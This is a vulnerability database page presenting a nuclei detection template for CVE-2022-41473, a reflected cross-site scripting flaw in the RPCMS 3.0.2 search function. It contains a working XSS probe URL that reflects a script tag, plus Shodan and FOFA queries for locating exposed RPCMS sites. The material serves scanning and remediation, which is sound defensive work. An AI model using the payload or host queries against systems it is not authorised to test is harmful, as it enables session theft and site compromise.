Lucene search
K

RPCMS 3.0.2 - Cross-Site Scripting

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

RPCMS 3.0.2 - Cross-Site Scripting in Search Function allows attacker to execute arbitrary scripts in victim's browser, steal authentication credentials, and launch attacks. Mitigate with security patch or upgrade

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-41473
13 Oct 202218:27
circl
CNNVD
RPCMS 跨站脚本漏洞
13 Oct 202200:00
cnnvd
CVE
CVE-2022-41473
13 Oct 202200:00
cve
Cvelist
CVE-2022-41473
13 Oct 202200:00
cvelist
NVD
CVE-2022-41473
13 Oct 202214:15
nvd
OSV
CVE-2022-41473
13 Oct 202214:15
osv
Prion
Cross site scripting
13 Oct 202214:15
prion
Positive Technologies
PT-2022-25880 · Rpcms · Rpcms
13 Oct 202200:00
ptsecurity
RedhatCVE
CVE-2022-41473
22 May 202523:46
redhatcve
Vulnrichment
CVE-2022-41473
13 Oct 202200:00
vulnrichment
Rows per page
id: CVE-2022-41473

info:
  name: RPCMS 3.0.2 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the website.
  remediation: |
    Apply the latest security patch or upgrade to a newer version of RPCMS to mitigate the XSS vulnerability.
  reference:
    - https://github.com/ralap-z/rpcms/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2022-41473
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-41473
    cwe-id: CWE-79
    epss-score: 0.01012
    epss-percentile: 0.58938
    cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: rpcms
    product: rpcms
    shodan-query:
      - http.html:"RPCMS"
      - http.html:"rpcms"
    fofa-query: body="rpcms"
  tags: cve,cve2022,rpcms,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'rpcms'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c1396ab8d2ecf0839541e70bad8b97277a3c730c416ea08e510b9f9a258fcf1f0220683ae8cab544d3473cdbdc5709207a0631dd79af7693566bb7f38e205e3eb719:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.01012
SSVC
25